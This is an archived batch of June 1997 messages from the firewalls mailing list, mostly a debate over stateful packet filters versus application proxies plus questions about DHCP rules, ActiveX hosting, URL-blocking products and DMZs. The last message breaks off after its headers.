Jun 1997 11:30:09 -0700 (PDT) Received: from grab (grab.coslabs.com [199.233.92.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA18693 for ; Mon, 9 Jun 1997 11:30:03 -0700 (PDT) Received: from future.mulligan.com by grab (SMI-8.6/SMI-SVR4) id MAA16828; Mon, 9 Jun 1997 12:30:38 -0600 Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) id MAA02426; Mon, 9 Jun 1997 12:30:22 -0600 Message-Id: <199706091830.MAA02426@future.mulligan.com> X-Mailer: exmh version 2.0gamma 1/27/96 To: "Simon J. Gerraty" cc: Ryan Russell/SYBASE , firewalls@greatcircle.com Subject: Re: Stateful Packet Filters vs. Proxies In-reply-to: Your message of "Sat, 07 Jun 1997 16:19:41 +1000." <199706070619.QAA25566@zen.quick.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 09 Jun 1997 12:30:22 -0600 From: Geoff Mulligan Sender: firewalls-owner@GreatCircle.COM Precedence: bulk sjg@quick.com.au said: > One thing to note - SPF and crypto do not mix. What! Certainly SPF and crypto do mix. Take a look at Sunscreen. It is a stateful packet screen AND supports strong crypto through the use of SKIP. Maybe you meant to say that NAT and crypto do not mix, but again depending on the configuration NAT and crypto can be used together. Again check out sunscreen from Sun. www.sun.com/security or www.sunscreen.com And Ryan, Sunscreen SPF does support NAT in a bridging environment. geoff From owner-firewalls-outgoing Mon Jun 9 15:38:49 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA12370 for firewalls-outgoing; Mon, 9 Jun 1997 14:05:08 -0700 (PDT) Received: from eclipse.ncmi-gsl.com (postoffice.ncmi-ny.com [206.25.169.25]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA12341 for ; Mon, 9 Jun 1997 14:04:57 -0700 (PDT) Received: from ny_nx_mail1.ncmi-gsl.com by eclipse.ncmi-gsl.com (8.7.5/8.7.3) with SMTP id QAA01057; Mon, 9 Jun 1997 16:44:46 -0400 (EDT) Received: from cygni by ny_nx_mail1.ncmi-gsl.com (NX5.67f2/NX3.0M) id AA02756; Mon, 9 Jun 97 16:44:45 -0400 Message-Id: <9706092044.AA02756@ny_nx_mail1.ncmi-gsl.com> Received: by cygni.ncmi-ny.com (NX5.67f2/NX3.0X) id AA01429; Mon, 9 Jun 97 16:44:45 -0400 Content-Type: text/plain Mime-Version: 1.0 (NeXT Mail 3.3 v118.2) Received: by NeXT.Mailer (1.118.2) From: Donald Branch Date: Mon, 9 Jun 97 16:44:44 -0400 To: firewall@GretCircle.COM Subject: DHCP and Firewall 1 Cc: firewalls References: <199706091953.MAA17398@notesgw2.sybase.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Let me restate my previous DHCP and firewall 1 Question. I have a Windows NT machine running DHCP I want to be able from that one machine to be able to get out to AOL but since it's ip address keeps changing I can't make a rule based on his ip address. I do not want to open up the port that AOL uses to the world just one machine. Any one have any ideas would be appreciated. Donald Branch Unix Sys Admin From owner-firewalls-outgoing Mon Jun 9 16:23:42 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA02168 for firewalls-outgoing; Mon, 9 Jun 1997 09:52:07 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA02140 for ; Mon, 9 Jun 1997 09:51:58 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id JAA23371 for ; Mon, 9 Jun 1997 09:56:10 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA04349; Mon, 9 Jun 97 09:53:59 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id JAA05491 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 09:52:50 -0700 (PDT) Message-Id: <199706091652.JAA05491@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id AB84F09A9593170B882564B1005CC9D8; Mon, 9 Jun 97 09:52:48 EDT To: "Craig I. Hagan" Cc: firewalls From: Ryan Russell/SYBASE Date: 9 Jun 97 9:58:45 EDT Subject: Re: Stateful Packet Filters vs. Proxies X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Source-code review - You think that SPFs don't have source code? Or do you take issues that the two main SPF vendors (Checkpoint and Cisco) don't provide source code for review? Black-box testing - Fw1 runs on a number of different OSes, though with a portion that is OS-specific in each case. Becaus of their nature, SPFs have to replace some portion of the host OS, and rely less on the host OS than a proxy. Some people think this is a good thing, given the number of OS problem out there. I'm not sure what the point of your performance question is, since that isn't a security question, but SPFs will perform better than proxyies, in general. Ryan ---------- Previous Message ---------- To: avalon cc: Ryan.Russell, sjg, firewalls From: hagan@cih.com ("Craig I. Hagan") @ smtp Date: 06/09/97 11:07:14 AM Subject: Re: Stateful Packet Filters vs. Proxies agreed. if i may extend your point, it is also easier to verify a proxy agent than it is an SPF as you have many more controls that you can use in your experiment: * source code review * easier black box testing - you can move the proxy agent to through a set of known operating systems to reduce the amount of possible os contamination in your tests my issues with SPFs aren't that they can't be secure, but, that they are being mismarketed. i don't think that everyone needs maximal security, but, people should understand the tradeoffs that they are making when they choose technology A over B, e.g. choosing an SPF (or similar strategy) over a proxy. > And whilst "anything is possible", current SPF technology does not yet > appear to have advanced far enough to allow them to work as universally > well as proxies. I would like to see what the cpu requirements would be to f/w a T3, 100mb ethernet, and (where possible) 1gb ethernet connections using proxies on following (optimially configured, of course): * commercial unix hw+sw (e.g. sun, alpha +osf/1) * commercial unix sw + pc hw (e.g. stuff like solaris x86, bsdi) * commercial hw + PD unices (e.g.alpha+linux/*bsd;sun+linux/*bsd,etc) * pc hw, pd unix (pc+linux/*bsd, etc) but, hey, that is wishful thinking on my part :) -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Mon Jun 9 16:35:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA15205 for firewalls-outgoing; Mon, 9 Jun 1997 14:26:45 -0700 (PDT) Received: from mail.ruhrgebiet.individual.net (in-ruhr.ruhr.de [141.39.224.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA15191 for ; Mon, 9 Jun 1997 14:26:37 -0700 (PDT) Received: (from admin@localhost) by mail.ruhrgebiet.individual.net (8.8.5/8.8.5) with UUCP id WAA20063 for firewalls@GreatCircle.COM; Mon, 9 Jun 1997 22:26:19 +0200 (MET DST) Received: from hostname.devnull.ruhr.de (benedikt@hostname.devnull.ruhr.de [192.168.122.11]) by devnull.local.net (8.6.12/8.6.9) with ESMTP id LAA01335 for ; Mon, 9 Jun 1997 11:36:33 +0200 Received: (from benedikt@localhost) by hostname.devnull.ruhr.de (8.7.5/8.7.3) id LAA00681; Mon, 9 Jun 1997 11:52:53 +0200 To: firewalls@GreatCircle.COM Subject: Re: Hosting ActiveX applets References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit From: Benedikt Stockebrand Date: 09 Jun 1997 11:52:52 +0200 In-Reply-To: Kevin McPeake's message of Sun, 8 Jun 1997 00:54:04 +0200 (MET DST) Message-ID: <87pvtw9k7f.fsf@devnull.ruhr.de> Lines: 22 X-Mailer: Gnus v5.3/Emacs 19.34 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Kevin McPeake writes: > Can someone tell me if there's any good reasons why we should not allow > ActiveX on our Web server to be served to visiting web browsing clients? Ask your lawyer about liability issues. If a malicious site abuses some security holes in your applets you may get into a bit of trouble. At least if you're in the US I think this alone should be reason enough not to host any ActiveX applets. Aside from legal issues you may want to consider the PR impact if it was publically known that your site hosted an ActiveX applet that got exploited by someone else. Ben -- Ben(edikt)? Stockebrand Runaway ping.de Admin---Never Ever Trust Old Friends My name and email address are not to be added to any list used for advertising purposes. Any sender of unsolicited advertisement e-mail to this address im- plicitly agrees to pay a DM 500 fee to the recipient for proofreading services. From owner-firewalls-outgoing Mon Jun 9 16:36:35 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA18139 for firewalls-outgoing; Mon, 9 Jun 1997 11:26:21 -0700 (PDT) Received: from grab (grab.coslabs.com [199.233.92.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA17971 for ; Mon, 9 Jun 1997 11:25:43 -0700 (PDT) Received: from future.mulligan.com by grab (SMI-8.6/SMI-SVR4) id MAA16791; Mon, 9 Jun 1997 12:26:13 -0600 Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) id MAA02413; Mon, 9 Jun 1997 12:26:08 -0600 Message-Id: <199706091826.MAA02413@future.mulligan.com> X-Mailer: exmh version 2.0gamma 1/27/96 To: Ryan Russell/SYBASE cc: "Kelly E. Gibbs" , Bill Stout , firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-reply-to: Your message of "06 Jun 1997 20:04:23 EDT." <199706070257.TAA09836@notesgw2.sybase.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 09 Jun 1997 12:26:08 -0600 From: Geoff Mulligan Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ryan.Russell@sybase.com said: > Well, the NAT I'm talking about specifically (IP NAT products like the > ones from Checkpoint and Cisco, and probably others) work at layer 4. > They need to understand TCP and so-forth. One could write one that > works strictly at layer 3, but for many IP protocols it wouldn't work > very well, and certainly wouldn't work for many-to-few NAT > implementations. One cannot write a NAT that functions only at layer 3-IP (if you are referring to the ISO layering labels). Any change of address in the IP header cascades into the pseudo header in UDP and TCP and must be reflected in a change in the their checksums. geoff From owner-firewalls-outgoing Mon Jun 9 16:36:34 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA28811 for firewalls-outgoing; Mon, 9 Jun 1997 12:38:44 -0700 (PDT) Received: from oisin.integration.adnc.com (oisin.adnc.com [205.216.138.42]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA28774 for ; Mon, 9 Jun 1997 12:38:31 -0700 (PDT) Received: from chuchullain.adnc.com ([205.216.138.81]) by oisin.integration.adnc.com (Post.Office MTA v3.1 release PO203a ID# 197-34225U100L100S0) with SMTP id AAA279; Mon, 9 Jun 1997 12:42:13 -0700 Date: Mon, 9 Jun 97 12:31:31 PDT From: Tom Byrnes Subject: RE: Does Raptor WebNOT Block Legitimate Sites? To: "2LT Jeffery J. Lowder, 333-4615" , "bpetrie@incc.net" , "firewalls@greatcircle.com" , "raptor-list@udc.com" , "'Allen Rogers'" , Tim Thayer X-Mailer: Chameleon ATX 6.0.1, Standards Based IntraNet Solutions, NetManage Inc. X-Priority: 3 (Normal) References: <01BC6F68.54F8BA80@ss1011-tt.bbtnet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't know if WebNOT does, but it's par for the course that URL blockers block a lot more than just porn. That's the problem with censorship, by basing our standards on "protecting children" we wind up with only those discussions and topics fit for a child (and by that I mean a 5 year old. Only in the US are teenagers considered children.) Check out: http://www.wired.com/news/politics/story/3229.html and then join the EFF, get rid of your URL blockers, and use measures of productivity to figure out who is playing when they should be working, and your logs to find subversion. If you treat your people like adults, they'll (for the most part), behave like it. The few who don't will be easy to spot. It's amazing how, having won the cold war, we have become that which we fought. --- On Mon, 2 Jun 1997 15:19:12 -0400 Tim Thayer wrote: > > Allen, any movement on this issue? We are still getting complaints from users. The most recent was URL: www.emeregency.com > > Tim Thayer > Information Security > Branch Banking & Trust > > > > >Date: Tue, 11 Mar 1997 08:21:10 -0500 (EST) > >X-Sender: arogers@raptor1.raptor.com (Unverified) > >To: "2LT Jeffery J. Lowder, 333-4615" , > > , , > >From: Allen Rogers > >Subject: Re: Does Raptor WebNOT Block Legitimate Sites? > > > > > >This is a list that Raptor licenses directly from Microsystems. The actual > >URLs used, and their abbreviated nature, is due to how Microsystems chooses > >to create their list. I am trying to open a formal path where our customers > >can present queries/requests to them directly for particular sites. I will > >keep you posted. > > > >-Allen > > > >At 09:29 AM 3/10/97 MST, 2LT Jeffery J. Lowder, 333-4615 wrote: > >>Hello, > >> > >>We recently installed Raptor WebNOT to work with our Raptor Eagle 4.0 > >>firewall. Remember that WebNOT can be used to block access to > >>'unauthorized' sites, where 'unauthorized' is defined as sites the company > >>doesn't want its employees visiting. > >> > >>Apparently their database of 'bad' URLs contains many truncated URLs. If > >>the URL is just an IP address, everything works great. However, if the > >>URL is more than an IP address -- if the URL contains a directory path, a > >>filename, or both -- we've found that the URL is normally truncated when > >>listed in the WebNOT database. For example, the URL for DejaNews Research > >>Service, > >> > >>http://199.86.32.6/members/stick/ > >> > >>is stored in the WebNOT database (httprating.db) as > >> > >>http://199.86.32.6/mem > >> > >>Now, I don't claim to have detailed knowledge of the computer at > >>199.86.32.6, but it stands to reason that there are probably multiple > >>subdirectories under the /members directory. Yet Raptor WebNOT blocks > >>access to ALL of these directories because apparently ONE of them contains > >>nudity. > >> > >> > >>You can imagine how much I enjoy taking heat from customers because we're > >>blocking access to ostensibly legitimate sites. > >> > >>Am I not understanding something, or is this very poor design on Raptor's > >>part? Is there anyone else out there who uses Raptor WebNOT and has > >>experienced this problem? > >> > >>I tried calling Raptor directly to make a bug report, but since I don't > >>have a maintenance contract with Raptor, the operator at Raptor customer > >>support wouldn't even take my call. > >> > >>Lt Jeff Lowder > >>Chief, Network Security > >>United States Air Force Academy > >> > >>Disclaimer: The above content does not necessarily represent the views of > >>the United States Government or the United States Air Force Academy. > >> > >> > >+-----------------------------------------------------------------------+ > >Allen Rogers | Raptor Systems Customer Support > >arogers@raptor.com | http://www.raptor.com/cs/ > >(617)487-7700 x128 | (888)-RAPTOR1 (617) 890-6532 (FAX) > >+-----------------------------------------------------------------------+ > > > > > > > +-----------------------------------------------------------------------+ > Allen Rogers | Raptor Systems Customer Support > arogers@raptor.com | http://www.raptor.com/cs/ > (617)487-7700 x128 | (888)-RAPTOR1 (617) 890-6532 (FAX) > +-----------------------------------------------------------------------+ > > > > ++++++++ > +++++++++++ > This list is sponsored by: GE Capital IT Solutions Universal Data Consultants, Norcross, GA. > To unsubscribe, send emailto: raptor-list-request@udc.com with 'unsubscribe' as body of message. > +++++++++++ > ++++++++ ---------------End of Original Message----------------- ************************************************************** / Tomas L. Byrnes, Applications Engineer / American Digital Network, Network Integration Group / Date: 06/09/97 Time: 12:31:31 / WANS/LANS, Connecting the World, Private/Public Networks, / ISPs, Data/LAN/Voice, Routing ************************************************************** From owner-firewalls-outgoing Mon Jun 9 16:49:21 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA15258 for firewalls-outgoing; Mon, 9 Jun 1997 11:11:24 -0700 (PDT) Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA15220 for ; Mon, 9 Jun 1997 11:11:10 -0700 (PDT) Received: from clark.net (proberts@explorer.clark.net [168.143.0.7]) by mail.clark.net (8.8.5/8.6.5) with ESMTP id OAA22048; Mon, 9 Jun 1997 14:11:12 -0400 (EDT) Received: from localhost (proberts@localhost) by clark.net (8.8.5/8.7.1) with SMTP id OAA03080; Mon, 9 Jun 1997 14:11:40 -0400 (EDT) X-Authentication-Warning: clark.net: proberts owned process doing -bs Date: Mon, 9 Jun 1997 14:11:38 -0400 (EDT) From: "Paul D. Robertson" To: Ryan Russell/SYBASE cc: firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-Reply-To: <199706091631.JAA03973@notesgw2.sybase.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 9 Jun 1997, Ryan Russell/SYBASE wrote: > I'm not sure how one would measure reliability, but > my personal experience has been good. > > I disagree that a SPF != a proxy, at least not > entirely. Well, the fact that the lower level protocols aren't protected behind the perimiter is an issue. With an applicaiton layer proxy, only the firewall needs to correctly handle sequence numbers, TCP window sizes, TCP headers, etc. With SPF, the SPF box implementations I've seen don't keep state on things like that for every connection, and if they do, normally out of order packet reception is severly degraded. At some point, you lose the advantages over application layer gateways if you keep too much state information. Also, it's very difficult to code application layer blocking without a great deal more work, for instance, blocking as a tag is different than blocking as a string. I've still yet to see an example of something a SPF blocks that an application layer gateway doesn't. The reverse certainly isn't true of current implementations. Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From owner-firewalls-outgoing Mon Jun 9 17:25:20 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA18179 for firewalls-outgoing; Mon, 9 Jun 1997 08:33:09 -0700 (PDT) Received: from ranger.syntaxgroup.it (ranger.syntaxgroup.it [161.27.170.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA18128 for ; Mon, 9 Jun 1997 08:32:50 -0700 (PDT) Received: by ranger.syntaxgroup.it with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC74FC.C615CF70@ranger.syntaxgroup.it>; Mon, 9 Jun 1997 17:44:26 +0200 Message-ID: From: Costa Simona To: "'Firewalls@GreatCircle.com'" Subject: DMZ Date: Mon, 9 Jun 1997 17:44:24 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everybody! I'm looking for some documentation concerning DMZ, just to explain to the boss what it is, how is configured and so on. Can any one help? Thank you in advance. Simona From owner-firewalls-outgoing Mon Jun 9 18:35:30 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA23556 for firewalls-outgoing; Mon, 9 Jun 1997 09:05:15 -0700 (PDT) Received: from zeke.gov.yk.ca (ZEKE.GOV.YK.CA [199.247.128.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA23492 for ; Mon, 9 Jun 1997 09:04:59 -0700 (PDT) Received: by zeke.gov.yk.ca; id JAA07504; Mon, 9 Jun 1997 09:11:35 -0700 (PDT) Received: from unknown(199.247.130.39) by zeke.gov.yk.ca via smap (V3.1) id xma007487; Mon, 9 Jun 97 09:11:21 -0700 Received: from [199.247.134.75] ([199.247.134.75]) by tempest.gov.yk.ca (8.7.5/8.7.3) with SMTP id IAA15818; Mon, 9 Jun 1997 08:57:51 -0700 From: Larry Kwiat To: proff@suburbia.net cc: firewalls@greatcircle.com Subject: Re: Cryptographic Mythology Message-ID: Date: Mon, 9 Jun 1997 09:19:23 -0400 (EDT) X-Mailer: Simeon for Windows Version 4.0 X-Authentication: none MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Jun 1997 02:03:43 +1000 (EST) proff@suburbia.net wrote: > Guards. Guardians. The Greeks didn't have many with bite and I'm.....> loosing patience with the whole culture. ...Have you considered Mahakala? -Tibetan Buddhist guardian of the Dharmas (natural laws, phil. incl. physics) It chains into the whole Hindu pantheon, but it makes an entertaining stop in Tibet in the 800's to engage the services of the local Bon religious security deities. They have interesting methods, having had their experiences with the Mongols etc. The chaotic aspect is particularly appealing. From owner-firewalls-outgoing Mon Jun 9 19:17:55 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA24199 for firewalls-outgoing; Mon, 9 Jun 1997 09:08:30 -0700 (PDT) Received: from deere2-bh.dx.deere.com (deere2-bh.dx.deere.com [207.122.201.67]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA24092 for ; Mon, 9 Jun 1997 09:08:08 -0700 (PDT) Received: (from uucp@localhost) by deere2-bh.dx.deere.com (8.6.12/8.6.11) id LAA13718; Mon, 9 Jun 1997 11:06:21 -0500 Received: from 192.43.1.3 by deere2-bh.dx.deere.com via smap (3.2) id xma013707; Mon, 9 Jun 97 11:06:09 -0500 Received: from 90.deere.com by deere (SMI-8.6/SMI-SVR4) id LAA06180; Mon, 9 Jun 1997 11:06:42 -0500 Received: from catbert.uu.deere.com by 90.deere.com (SMI-8.6/SMI-SVR4) id LAA24963; Mon, 9 Jun 1997 11:06:40 -0500 Message-ID: <339C2A10.FDAC0C72@90.deere.com> Date: Mon, 09 Jun 1997 11:06:40 -0500 From: Bertrum Carroll Organization: Deere & Company X-Mailer: Mozilla 4.0b5 [en] (Win95; I) MIME-Version: 1.0 To: "Daniel G. Drumm" CC: Hidayatullah Khan , "Firewalls@GreatCircle.COM" Subject: Re: Restrict Springboarding X-Priority: 3 (Normal) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm sure your getting a lot of good ideals to help stop spring boarding. Please consider the following. 1. Start with your lawyers. Have your business partners agree not to "springboard" 2. Put your anti springboard in place and test it (wrappers or what ever you pick). 3. Turn on "auditing" on the target systems. Thus if someone attempts to springboard you will have a clue. But, you must check your logs! ....... Insert standard legal disclaimers,,,,, Not the view of my firm .... so on and so on..... From owner-firewalls-outgoing Mon Jun 9 19:48:07 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA29299 for firewalls-outgoing; Mon, 9 Jun 1997 15:54:38 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA29270 for ; Mon, 9 Jun 1997 15:54:30 -0700 (PDT) Received: from bizet.videotron.net (bizet.videotron.net [205.151.222.75]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id PAA22874 for ; Mon, 9 Jun 1997 15:57:22 -0700 (PDT) Received: from vldejqqt (ppp087.216.msherb.videotron.net [207.96.216.87]) by bizet.videotron.net (8.8.5/8.8.2) with ESMTP id SAA03968 for ; Mon, 9 Jun 1997 18:55:01 -0400 (EDT) Message-Id: <199706092255.SAA03968@bizet.videotron.net> From: "Smoothy" To: Date: Mon, 9 Jun 1997 19:00:18 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk POSTS Hello, I'm presently looking to establish which confusions all the security mechanisms can involve in opposition with the ethics. If any ideas came to your mind...would u please send it to my email address : smoothy@videotron.ca. Example: lot of firewalls need to desencrypt a mail for checking viruses in, but it's directly in opposition of the confidentiality. Tx to all of u ! Stephane Routhier Bombardier Inc. Division Sea-Doo/Ski-doo From owner-firewalls-outgoing Mon Jun 9 19:53:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA15248 for firewalls-outgoing; Mon, 9 Jun 1997 17:09:44 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA15230 for ; Mon, 9 Jun 1997 17:09:35 -0700 (PDT) Message-Id: <199706100009.RAA15230@honor.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA096841061; Tue, 10 Jun 1997 10:04:21 +1000 From: Darren Reed Subject: Re: Stateful Packet Filters vs. Proxies To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE) Date: Tue, 10 Jun 1997 10:04:21 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199706091645.JAA04938@notesgw2.sybase.com> from "Ryan Russell/SYBASE" at Jun 9, 97 09:51:38 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Ryan Russell/SYBASE, sie said: > > The FTP port command thing was fixed, I don't know in what version. > > I don't know what you mean by not recreating the upper > layers of data. The reason FTP requires special > handling is because of the way FTP works, not TCP. > All of TCP is not a special case, as FTP is. There > are a whole bunch of applications that work as > telnet-style TCP that one's SPF/proxy doesn't need to > have a clue about unless you want to do some > kind of filtering. Humbug. That is the sort of reasoning which has led to these problems. TCP is a data stream. What does that mean ? It means data goes through it in a byte-by-byte fashion. If more than one byte is in a packet, well that makes for better efficiency. What you're seeing when FW1 broke is the assumption that the entire "PORT" command was in one packet (the usual behaviour and optimization). That it broke highlights the flaw - they're not treating TCP like TCP. Darren From owner-firewalls-outgoing Mon Jun 9 19:55:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA13384 for firewalls-outgoing; Mon, 9 Jun 1997 19:31:40 -0700 (PDT) Received: from mnau.mn.br.np.els-gms.att.net (mnau.mn.br.np.els-gms.att.net [199.191.131.87]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id TAA13301 for ; Mon, 9 Jun 1997 19:31:24 -0700 (PDT) From: Brown_Michael_K@bns.attmail.com Date: Mon, 09 Jun 1997 22:31:43 -0400 Received: from bns by attmail; Tue Jun 10 02:32 GMT 1997 Received: from misfld01.bns.att.com (misfld01.bns.att.com [135.170.169.239]) by ptown1.bns.att.com (8.7.3/2.4) with ESMTP id TAA17638 for ; Mon, 9 Jun 1997 19:36:24 -0700 (PDT) Received: from localhost by misfld01.bns.att.com with SMTP (1.40.112.8/16.2) id AA208089914; Mon, 9 Jun 1997 22:31:54 -0400 Subject: Simple firewall? To: internet!GreatCircle.COM!firewalls@bns.attmail.com X-Openmail-Hops: 1 Message-Id: <01A1542B@MHS> X-OM2PMX: @(#) $2.0$ Mime-Version: 1.0 Content-Disposition: attachment; filename="text1.txt" Content-Type: Text/Plain; charset=us-ascii; name="text1.txt" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If someone just wants to only allow email into their network, perform NAT(since they are not registered legal internal addresses) and allow internal users to surf the internet using http, what is the most economical and still secure way/product to do this? Thanks in advance. From owner-firewalls-outgoing Mon Jun 9 20:25:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA27883 for firewalls-outgoing; Mon, 9 Jun 1997 18:10:37 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA20059 for ; Mon, 9 Jun 1997 17:32:15 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id RAA00549 for ; Mon, 9 Jun 1997 17:36:11 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA18585; Mon, 9 Jun 97 17:33:35 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id RAA02591 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 17:31:48 -0700 (PDT) Message-Id: <199706100031.RAA02591@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 14F78B884E810F2C882564B2000364E5; Mon, 9 Jun 97 17:31:23 EDT To: Donald Branch Cc: firewall , firewalls From: Ryan Russell/SYBASE Date: 9 Jun 97 17:38:06 EDT Subject: Re: DHCP and Firewall 1 X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ok, much clearer. No, you're screwed. Seriously, FW1 doesn't allow for rules to kick in on the fly, and I don't believe you can write rules based on name or anything like that. Ryan ---------- Previous Message ---------- To: firewall cc: firewalls From: donaldb@ncmi-ny.com (Donald Branch) @ smtp Date: 06/09/97 04:44:44 PM Subject: DHCP and Firewall 1 Let me restate my previous DHCP and firewall 1 Question. I have a Windows NT machine running DHCP I want to be able from that one machine to be able to get out to AOL but since it's ip address keeps changing I can't make a rule based on his ip address. I do not want to open up the port that AOL uses to the world just one machine. Any one have any ideas would be appreciated. Donald Branch Unix Sys Admin From owner-firewalls-outgoing Mon Jun 9 20:31:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA08658 for firewalls-outgoing; Mon, 9 Jun 1997 19:02:34 -0700 (PDT) Received: from cih-gw.cih.com (cih-gw.cih.com [204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA08623 for ; Mon, 9 Jun 1997 19:02:25 -0700 (PDT) Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id WAA24209; Mon, 9 Jun 1997 22:04:07 -0400 X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd24205aaa; Tue Jun 10 02:03:59 1997 Date: Mon, 9 Jun 1997 22:03:59 -0400 (EDT) From: "Craig I. Hagan" Reply-To: hagan@cih.com To: Anton J Aylward 